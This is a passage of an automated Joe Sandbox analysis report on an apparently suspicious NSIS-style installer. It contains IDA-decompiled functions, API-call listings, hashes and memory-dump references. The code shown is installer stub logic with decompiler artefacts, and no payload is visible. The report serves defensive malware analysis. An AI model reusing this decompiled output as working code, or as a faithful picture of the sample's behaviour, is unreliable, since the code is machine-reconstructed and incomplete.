                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                      • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                      • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                      • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 73%
                                                                                      			E00401E4E(intOrPtr __edx) {
                                                                                      				void* __edi;
                                                                                      				int _t9;
                                                                                      				signed char _t15;
                                                                                      				struct HFONT__* _t18;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t31;
                                                                                      				struct HDC__* _t33;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_t30 = __edx;
                                                                                      				_t33 = GetDC( *(_t35 - 8));
                                                                                      				_t9 = E00402D84(2);
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                      				ReleaseDC( *(_t35 - 8), _t33);
                                                                                      				 *0x40ce00 = E00402D84(3);
                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				 *0x40ce07 = 1;
                                                                                      				 *0x40ce04 = _t15 & 0x00000001;
                                                                                      				 *0x40ce05 = _t15 & 0x00000002;
                                                                                      				 *0x40ce06 = _t15 & 0x00000004;
                                                                                      				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                      				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                      				_push(_t18);
                                                                                      				_push(_t31);
                                                                                      				E00406484();
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2584051700-0
                                                                                      • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                      • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                      • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                      • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 59%
                                                                                      			E00401C43(intOrPtr __edx) {
                                                                                      				int _t29;
                                                                                      				long _t30;
                                                                                      				signed int _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				long _t36;
                                                                                      				int _t41;
                                                                                      				signed int _t42;
                                                                                      				int _t46;
                                                                                      				int _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				struct HWND__* _t63;
                                                                                      				void* _t64;
                                                                                      
                                                                                      				_t57 = __edx;
                                                                                      				_t29 = E00402D84(3);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 - 0x18) = _t29;
                                                                                      				_t30 = E00402D84(4);
                                                                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      				 *(_t64 + 8) = _t30;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                      				}
                                                                                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                      					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                      				_push(1);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t61 = E00402DA6();
                                                                                      					_t32 = E00402DA6();
                                                                                      					asm("sbb ecx, ecx");
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t35 =  ~( *_t31) & _t61;
                                                                                      					__eflags = _t35;
                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					_t63 = E00402D84();
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t41 = E00402D84(2);
                                                                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                      					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                      					if(__eflags == 0) {
                                                                                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                      						L10:
                                                                                      						 *(_t64 - 0x38) = _t36;
                                                                                      					} else {
                                                                                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                      						asm("sbb eax, eax");
                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                      					_push( *(_t64 - 0x38));
                                                                                      					E00406484();
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                                      				return 0;
                                                                                      			}
















                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                      • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                      • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                      • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                      				char _v68;
                                                                                      				char _v132;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				void* _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t53;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t23 = _a16;
                                                                                      				_t53 = _a12;
                                                                                      				_t44 = 0xffffffdc;
                                                                                      				if(_t23 == 0) {
                                                                                      					_push(0x14);
                                                                                      					_pop(0);
                                                                                      					_t24 = _t53;
                                                                                      					if(_t53 < 0x100000) {
                                                                                      						_push(0xa);
                                                                                      						_pop(0);
                                                                                      						_t44 = 0xffffffdd;
                                                                                      					}
                                                                                      					if(_t53 < 0x400) {
                                                                                      						_t44 = 0xffffffde;
                                                                                      					}
                                                                                      					if(_t53 < 0xffff3333) {
                                                                                      						_t52 = 0x14;
                                                                                      						asm("cdq");
                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                      					}
                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                      					_t55 = _t24 >> 0;
                                                                                      					_t46 = 0xa;
                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                      				} else {
                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                      					_t50 = 0;
                                                                                      				}
                                                                                      				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                      				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                      				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                      				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                      				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                      			}


                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                      • wsprintfW.USER32 ref: 00404DF0
                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405EB7(WCHAR* _a4) {
                                                                                      				WCHAR* _t5;
                                                                                      				short* _t7;
                                                                                      				WCHAR* _t10;
                                                                                      				short _t11;
                                                                                      				WCHAR* _t12;
                                                                                      				void* _t14;
                                                                                      
                                                                                      				_t12 = _a4;
                                                                                      				_t10 = CharNextW(_t12);
                                                                                      				_t5 = CharNextW(_t10);
                                                                                      				_t11 =  *_t12;
                                                                                      				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                                                      					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                                                      						L10:
                                                                                      						return 0;
                                                                                      					} else {
                                                                                      						_t14 = 2;
                                                                                      						while(1) {
                                                                                      							_t14 = _t14 - 1;
                                                                                      							_t7 = E00405E39(_t5, 0x5c);
                                                                                      							if( *_t7 == 0) {
                                                                                      								goto L10;
                                                                                      							}
                                                                                      							_t5 = _t7 + 2;
                                                                                      							if(_t14 != 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							return _t5;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      				} else {
                                                                                      					return CharNextW(_t5);
                                                                                      				}
                                                                                      			}


                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                      • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                      • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E00405E0C(WCHAR* _a4) {
                                                                                      				WCHAR* _t9;
                                                                                      
                                                                                      				_t9 = _a4;
                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                      				_push(_t9);
                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}


                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E710310E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                      				void* _v0;
                                                                                      				void* _t27;
                                                                                      				signed int _t29;
                                                                                      				void* _t30;
                                                                                      				void* _t34;
                                                                                      				void* _t36;
                                                                                      				void* _t38;
                                                                                      				void* _t40;
                                                                                      				void* _t48;
                                                                                      				void* _t54;
                                                                                      				void* _t63;
                                                                                      				void* _t64;
                                                                                      				signed int _t66;
                                                                                      				void* _t67;
                                                                                      				void* _t73;
                                                                                      				void* _t74;
                                                                                      				void* _t77;
                                                                                      				void* _t80;
                                                                                      				void _t81;
                                                                                      				void _t82;
                                                                                      				intOrPtr _t84;
                                                                                      				void* _t86;
                                                                                      				void* _t88;
                                                                                      
                                                                                      				 *0x7103506c = _a8;
                                                                                      				 *0x71035070 = _a16;
                                                                                      				 *0x71035074 = _a12;
                                                                                      				_a12( *0x71035048, E71031651, _t73);
                                                                                      				_t66 =  *0x7103506c +  *0x7103506c * 4 << 3;
                                                                                      				_t27 = E710312E3();
                                                                                      				_v0 = _t27;
                                                                                      				_t74 = _t27;
                                                                                      				if( *_t27 == 0) {
                                                                                      					L28:
                                                                                      					return GlobalFree(_t27);
                                                                                      				}
                                                                                      				do {
                                                                                      					_t29 =  *_t74 & 0x0000ffff;
                                                                                      					_t67 = 2;
                                                                                      					_t74 = _t74 + _t67;
                                                                                      					_t88 = _t29 - 0x66;
                                                                                      					if(_t88 > 0) {
                                                                                      						_t30 = _t29 - 0x6c;
                                                                                      						if(_t30 == 0) {
                                                                                      							L23:
                                                                                      							_t31 =  *0x71035040;
                                                                                      							if( *0x71035040 == 0) {
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							E71031603( *0x71035074, _t31 + 4, _t66);
                                                                                      							_t34 =  *0x71035040;
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      							 *0x71035040 =  *_t34;
                                                                                      							L25:
                                                                                      							GlobalFree(_t34);
                                                                                      							goto L26;
                                                                                      						}
                                                                                      						_t36 = _t30 - 4;
                                                                                      						if(_t36 == 0) {
                                                                                      							L13:
                                                                                      							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                      							_t74 = _t74 + _t67;
                                                                                      							_t34 = E71031312(E7103135A(_t38));
                                                                                      							L14:
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						_t40 = _t36 - _t67;
                                                                                      						if(_t40 == 0) {
                                                                                      							L11:
                                                                                      							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                      							_t74 = _t74 + _t67;
                                                                                      							_t34 = E71031381(_t80, E710312E3());
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						L8:
                                                                                      						if(_t40 == 1) {
                                                                                      							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                      							_t10 = _t81 + 4; // 0x4
                                                                                      							E71031603(_t10,  *0x71035074, _t66);
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      							 *_t81 =  *0x71035040;
                                                                                      							 *0x71035040 = _t81;
                                                                                      						}
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					if(_t88 == 0) {
                                                                                      						_t48 =  *0x71035070;
                                                                                      						_t77 =  *_t48;
                                                                                      						 *_t48 =  *_t77;
                                                                                      						_t49 = _v0;
                                                                                      						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                      						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                      							E71031603(_t49, _t77 + 8, 0x38);
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      						}
                                                                                      						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                      						GlobalFree(_t77);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					_t54 = _t29 - 0x46;
                                                                                      					if(_t54 == 0) {
                                                                                      						_t82 = GlobalAlloc(0x40,  *0x7103506c +  *0x7103506c + 8);
                                                                                      						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                      						_t14 = _t82 + 8; // 0x8
                                                                                      						E71031603(_t14, _v0, 0x38);
                                                                                      						_t86 = _t86 + 0xc;
                                                                                      						 *_t82 =  *( *0x71035070);
                                                                                      						 *( *0x71035070) = _t82;
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					_t63 = _t54 - 6;
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L23;
                                                                                      					}
                                                                                      					_t64 = _t63 - 4;
                                                                                      					if(_t64 == 0) {
                                                                                      						 *_t74 =  *_t74 + 0xa;
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					_t40 = _t64 - _t67;
                                                                                      					if(_t40 == 0) {
                                                                                      						 *_t74 =  *_t74 + 0xa;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      					L26:
                                                                                      				} while ( *_t74 != 0);
                                                                                      				_t27 = _v0;
                                                                                      				goto L28;
                                                                                      			}


                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 71031171
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 710311E3
                                                                                      • GlobalFree.KERNEL32 ref: 7103124A
                                                                                      • GlobalFree.KERNEL32(?), ref: 7103129B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710312B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9f47247b5d1ee692b33a6a6c9b18e1120a38a5853d34ecaa04f873658fee350f
                                                                                      • Instruction ID: 249072bdda034d353ca432dc85b1ff47e4be65d200a4f2b56013507238e453a5
                                                                                      • Opcode Fuzzy Hash: 9f47247b5d1ee692b33a6a6c9b18e1120a38a5853d34ecaa04f873658fee350f
                                                                                      • Instruction Fuzzy Hash: 8351D2B6908202DFE700CF6AC944A65BBF9FF8CB14B90415DF946DB220EB32E910CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                      				signed int _t14;
                                                                                      				int _t17;
                                                                                      				void* _t24;
                                                                                      				intOrPtr* _t29;
                                                                                      				void* _t31;
                                                                                      				signed int _t32;
                                                                                      				void* _t35;
                                                                                      				void* _t40;
                                                                                      				signed int _t42;
                                                                                      
                                                                                      				_t29 = __edi;
                                                                                      				_t24 = __ebx;
                                                                                      				_t14 =  *(_t35 - 0x28);
                                                                                      				_t40 = __edx - 0x38;
                                                                                      				 *(_t35 - 0x10) = _t14;
                                                                                      				_t27 = 0 | _t40 == 0x00000000;
                                                                                      				_t32 = _t40 == 0;
                                                                                      				if(_t14 == __ebx) {
                                                                                      					if(__edx != 0x38) {
                                                                                      						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                      					} else {
                                                                                      						E00402DA6(0x21);
                                                                                      						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp", "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll", 0x400);
                                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll");
                                                                                      					}
                                                                                      				} else {
                                                                                      					E00402D84(1);
                                                                                      					 *0x40adf0 = __ax;
                                                                                      					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                      				}
                                                                                      				 *(_t35 + 8) = _t17;
                                                                                      				if( *_t29 == _t24) {
                                                                                      					L13:
                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                      				} else {
                                                                                      					_t31 = E0040649D(_t27, _t29);
                                                                                      					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                                      						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *(_t35 + 8));
                                                                                      						_t42 = _t14;
                                                                                      						if(_t42 == 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}


                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 00402695
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp$C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll
                                                                                      • API String ID: 1659193697-1090455584
                                                                                      • Opcode ID: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                      • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                      • Opcode Fuzzy Hash: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                      • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403019(intOrPtr _a4) {
                                                                                      				long _t2;
                                                                                      				struct HWND__* _t3;
                                                                                      				struct HWND__* _t6;
                                                                                      
                                                                                      				if(_a4 == 0) {
                                                                                      					__eflags =  *0x42aa20; // 0x0
                                                                                      					if(__eflags == 0) {
                                                                                      						_t2 = GetTickCount();
                                                                                      						__eflags = _t2 -  *0x434f0c;
                                                                                      						if(_t2 >  *0x434f0c) {
                                                                                      							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                                      							 *0x42aa20 = _t3;
                                                                                      							return ShowWindow(_t3, 5);
                                                                                      						}
                                                                                      						return _t2;
                                                                                      					} else {
                                                                                      						return E00406946(0);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t6 =  *0x42aa20; // 0x0
                                                                                      					if(_t6 != 0) {
                                                                                      						_t6 = DestroyWindow(_t6);
                                                                                      					}
                                                                                      					 *0x42aa20 = 0;
                                                                                      					return _t6;
                                                                                      				}
                                                                                      			}







                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                      • GetTickCount.KERNEL32 ref: 0040304A
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
